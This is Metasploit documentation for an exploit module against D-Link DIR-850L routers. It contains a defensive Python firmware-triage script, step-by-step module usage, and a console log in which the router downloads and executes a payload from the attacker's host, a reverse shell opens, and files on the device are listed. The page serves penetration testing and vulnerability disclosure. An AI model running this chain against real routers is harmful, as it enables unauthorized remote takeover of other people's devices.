metasploit-gs/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md
2017-11-03 09:09:51 -04:00

The module dlink_dir850l_unauth_exec leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands through an authenticated OS command injection vulnerability. D-Link DIR-850L devices (excluding "Cloud" models) with firmware versions up to 1.14B07 are potentially vulnerable. The vulnerability appears to lie in the parsing of the configuration. Another PoC can be found at https://www.seebug.org/vuldb/ssvid-96333. Setting the command to reboot will force the router into an infinite loop.
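For asset owners, the practical question the paragraph above raises is which DIR-850L units fall into the affected range (firmware up to 1.14B07, Cloud models excluded). The following is an added triage example written for this page; it is not code from the Metasploit module or from D-Link. It assumes firmware strings of the form "1.14B07" (major.minor followed by an optional "B" build number, the format of the version quoted above) and that whether a unit is a Cloud model is already known from the inventory; the inventory row layout and the hostnames are constructed for the example.

```python
import re
from typing import Iterable, List, Tuple

# Last firmware version the page lists as affected (DIR-850L, up to 1.14B07).
LAST_AFFECTED = (1, 14, 7)

# Firmware strings on these devices look like "1.14B07": major.minor followed by
# an optional "B" build number. Format assumed from the version quoted on the page.
_FW_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:B(\d+))?\s*$", re.IGNORECASE)


def parse_firmware(version: str) -> Tuple[int, int, int]:
    """Turn '1.14B07' into the comparable tuple (1, 14, 7).

    A missing build suffix is treated as build 0 so that '1.14' sorts before
    '1.14B01'. Unrecognised strings raise rather than silently passing.
    """
    m = _FW_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised DIR-850L firmware string: {version!r}")
    major, minor, build = m.groups()
    return (int(major), int(minor), int(build) if build is not None else 0)


def is_affected_firmware(version: str, cloud_model: bool = False) -> bool:
    """True when a non-Cloud DIR-850L runs firmware <= 1.14B07."""
    if cloud_model:
        # The page excludes "Cloud" models from the affected set.
        return False
    return parse_firmware(version) <= LAST_AFFECTED


def triage(inventory: Iterable[Tuple[str, str, bool]]) -> List[str]:
    """Return the hostnames whose firmware falls in the affected range.

    Each inventory row is (hostname, firmware_string, is_cloud_model); this
    row layout is an assumption for the example, not a D-Link export format.
    Unparseable firmware strings are reported too, since an unknown version
    cannot be cleared.
    """
    flagged = []
    for hostname, firmware, cloud in inventory:
        try:
            affected = is_affected_firmware(firmware, cloud_model=cloud)
        except ValueError:
            affected = True  # unknown version: treat as needing review
        if affected:
            flagged.append(hostname)
    return flagged


# Constructed sample inventory (not real devices).
SAMPLE_INVENTORY = [
    ("gw-branch-1", "1.14B07", False),  # last affected build
    ("gw-branch-2", "1.15B02", False),  # above the affected range
    ("gw-branch-3", "1.09B02", False),  # older build, affected
    ("gw-branch-4", "1.14B07", True),   # Cloud model, excluded by the page
    ("gw-branch-5", "unknown", False),  # unparseable, flagged for review
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: review/upgrade firmware")
```

The comparison is done on an integer tuple rather than on the raw string so that "1.9B02" and "1.14B07" order correctly; treating an unparseable version as affected keeps an odd inventory entry from being silently cleared.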

## Vulnerable Application

1. Start msfconsole
2. Do: `use exploit/linux/http/dlink_dir850l_unauth_exec.rb`
3. Do: `set RHOST [RouterIP]`
4. Do: `set PAYLOAD linux/mipsle/shell/reverse_tcp`
5. Do: `run`
6. If the router is vulnerable, the payload should be dropped via wget and executed, and a session should be obtained

## Example

```
msf > use exploit/linux/http/dlink_dir850l_unauth_exec
msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
RHOST => 192.168.0.14
msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
RPORT => 80
msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3
LHOST => ens3
msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
LPORT => 1351
msf exploit(dlink_850l_unauthenticated_exec) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.11:1351
msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO
[*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO
[*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO
[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO
[*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
[*] 192.168.0.14:80 - Sending payload to the server...
[*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO
[*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO
[*] 192.168.0.14:80 - Waiting for shell to connect back to us...
[*] Sending stage (84 bytes) to 192.168.0.14
[*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400
[+] Deleted /tmp/dhufstzw
sessions -i 1
[*] Starting interaction with 1...

3353690789
yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC
true
MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA
mMzxldJdkNYWlIrHrOazzOcpCRTuRipt
OayNFBMDfTSaJIFwpNPoWErXCvLmIguK
[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
[*] Server stopped.
pwd
/
ls
www
var
usr
tmp
sys
sbin
proc
mydlink
mnt
lib
include
htdocs
home
etc
dev
bin
```